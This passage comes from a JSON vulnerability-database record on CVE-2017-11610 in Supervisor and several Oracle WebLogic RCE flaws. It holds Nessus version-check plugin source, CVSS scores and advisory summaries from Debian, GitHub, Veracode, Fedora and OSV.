value:\"2017/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 
Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"py27-supervisor<3.3.3,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:48", "description": "Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-11T00:00:00", "type": "nessus", "title": "Fedora 24 : supervisor (2017-713430fb15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:supervisor", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-713430FB15.NASL", "href": "https://www.tenable.com/plugins/nessus/102393", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-713430fb15.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n 
script_id(102393);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"FEDORA\", value:\"2017-713430fb15\");\n\n script_name(english:\"Fedora 24 : supervisor (2017-713430fb15)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-713430fb15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected supervisor package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"supervisor-3.1.4-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"supervisor\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-19T15:44:31", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by a remote code execution vulnerability in the Oracle Fusion Middleware Console subcomponent. 
An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to execute arbitrary commands.\n\nNo reliable remote exploit has been published for Oracle WebLogic Server 10.3.6.X or 12.1.3.X, so Nessus will not be able to determine if the remote server is affected or not for these versions.", "cvss3": {}, "published": "2020-11-06T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server RCE (CVE-2020-14882)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14882"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CVE-2020-14882.NBIN", "href": "https://www.tenable.com/plugins/nessus/142594", "sourceData": "Binary data oracle_weblogic_server_CVE-2020-14882.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-17T14:57:18", "description": "The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in the October 2020 CPU advisory.\n\n - An unspecified vulnerability exists in the Console component. An unauthenticated, remote attacker with network access via HTTP can exploit this issue to compromise the server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14750, CVE-2020-14882)\n\n - An unspecified vulnerability exists in the Core component. An unauthenticated, remote attacker can exploit this issue via the IIOP and T3 protocols to compromise the server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14859)\n\n - An unspecified vulnerability exists in the Core component. An unauthenticated, remote attacker can exploit this issue via the IIOP protocol to compromise the server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. 
(CVE-2020-14841)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-22T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Oct 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-17267", "CVE-2020-11022", "CVE-2020-14750", "CVE-2020-14757", "CVE-2020-14820", "CVE-2020-14825", "CVE-2020-14841", "CVE-2020-14859", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-9488"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2020.NASL", "href": "https://www.tenable.com/plugins/nessus/141807", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141807);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\n \"CVE-2019-17267\",\n \"CVE-2020-9488\",\n \"CVE-2020-11022\",\n \"CVE-2020-14750\",\n \"CVE-2020-14757\",\n \"CVE-2020-14820\",\n \"CVE-2020-14825\",\n \"CVE-2020-14841\",\n \"CVE-2020-14859\",\n \"CVE-2020-14882\",\n \"CVE-2020-14883\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0478\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0132\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Oct 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of WebLogic Server installed on the 
remote host is affected by multiple vulnerabilities as referenced in\nthe October 2020 CPU advisory.\n\n - An unspecified vulnerability exists in the Console component. An unauthenticated, remote attacker with\n network access via HTTP can exploit this issue to compromise the server. Successful attacks of this \n vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14750, CVE-2020-14882)\n\n - An unspecified vulnerability exists in the Core component. An unauthenticated, remote attacker can exploit \n this issue via the IIOP and T3 protocols to compromise the server. Successful attacks of this\n vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-14859)\n\n - An unspecified vulnerability exists in the Core component. An unauthenticated, remote attacker can exploit\n this issue via the IIOP protocol to compromise the server. Successful attacks of this vulnerability can\n result in takeover of Oracle WebLogic Server. (CVE-2020-14841)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpuoct2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2020.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/alert-cve-2020-14750.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2020 Oracle Critical Patch Update advisory and the Oracle Security\nAlert advisory for CVE-2020-14750.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14882\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic Server Administration Console Handle RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_ports(\"installed_sw/Oracle WebLogic Server\", \"installed_sw/Oracle Data Integrator Embedded Weblogic Server\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\napp_name = 'Oracle WebLogic Server';\napp_name_odi = 'Oracle Data Integrator Embedded Weblogic Server';\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\nnormal_installs = get_installs(app_name:app_name, port:port, exit_if_not_found:FALSE);\nodi_installs = get_installs(app_name:app_name_odi, port:port, exit_if_not_found:FALSE);\nall_installs = {};\n\nif (odi_installs[0] == IF_OK)\n all_installs = odi_installs[1];\n\nif (normal_installs[0] == IF_OK)\n all_installs = make_list2(all_installs, normal_installs[1]);\n\nif (empty(all_installs))\n audit(AUDIT_NOT_INST, app_name + ' or ' + app_name_odi);\n\ninstall = branch(all_installs);\nversion = install['version'];\n\nfix = NULL;\nfix_ver = NULL;\n\nif (version =~ \"^14\\.1\\.1\\.0($|[^0-9])\")\n{\n fix_ver = '14.1.1.0.200930';\n fix = make_list('31957062', '32097180');\n}\nelse if (version =~ \"^12\\.2\\.1\\.4($|[^0-9])\")\n{\n fix_ver = '12.2.1.4.201001';\n fix = make_list('31960985', '32097167');\n}\nelse if (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = '12.2.1.3.201001';\n fix = make_list('31961038', '32097173');\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = '12.1.3.0.201020';\n fix = make_list('31656851', '32097177');\n}\nelse if (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = '10.3.6.0.201020';\n fix = make_list('NA7A', 'KYRS');\n}\n\nif (isnull(fix_ver) || ver_compare(ver:version, fix:fix_ver, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install['path']);\n\nelse {\n report =\n '\\n Oracle Home : ' + install['Oracle Home'] +\n '\\n 
Install path : ' + install['path'] +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:', ', fix);\n security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "debiancve": [{"lastseen": "2023-09-29T11:03:46", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T14:29:00", "type": "debiancve", "title": "CVE-2017-11610", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-23T14:29:00", "id": "DEBIANCVE:CVE-2017-11610", "href": "https://security-tracker.debian.org/tracker/CVE-2017-11610", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "github": [{"lastseen": "2023-09-27T22:12:21", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 
allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:42:26", "type": "github", "title": "Incorrect Default Permissions in Supervisor", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2023-01-27T05:02:33", "id": "GHSA-X7C8-4X3H-874W", "href": "https://github.com/advisories/GHSA-x7c8-4x3h-874w", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T13:12:19", "description": "Supervisor is vulnerable to remote code execution (RCE) attacks. 
A malicious user can send a malicious XMLRPC request to the application to inject and execute arbitrary commands at daemon level privilege.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-15T09:19:14", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2019-10-03T07:06:18", "id": "VERACODE:12590", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-12590/summary", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T16:10:20", "description": "Supervisor is vulnerable to remote code execution (RCE) attacks. 
A malicious user can send a malicious XMLRPC request to the application to inject and execute arbitrary commands at daemon level privilege.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-24T22:39:07", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2019-10-03T07:06:18", "id": "VERACODE:4649", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-4649/summary", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "The supervisor is a client/server system that allows its users to control a number of processes on UNIX-like operating systems. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-07T20:18:38", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: supervisor-3.1.4-1.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-07T20:18:38", "id": "FEDORA:4F26D6017118", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "The supervisor is a client/server system that allows its users to control a number of processes on UNIX-like operating systems. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-07T21:23:15", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: supervisor-3.2.4-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-07T21:23:15", "id": "FEDORA:7D239601DD9B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "The supervisor is a client/server system that allows its users to control a number of processes on UNIX-like operating systems. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-07T17:22:19", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: supervisor-3.3.3-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-07T17:22:19", "id": "FEDORA:7151D601710E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4GMSCGMM477N64Z3BM34RWYBGSLK466B/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:20:25", "description": "\nA vulnerability has been found in supervisor, a system for controlling\nprocess state, where an authenticated client can send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands\non the server. 
The commands will be run as the same user as supervisord.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n3.0a8-1.1+deb7u2.\n\n\nWe recommend that you upgrade your supervisor packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-31T00:00:00", "type": "osv", "title": "supervisor - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2022-07-21T05:51:45", "id": "OSV:DLA-1047-1", "href": "https://osv.dev/vulnerability/DLA-1047-1", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-03-07T05:20:56", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, 
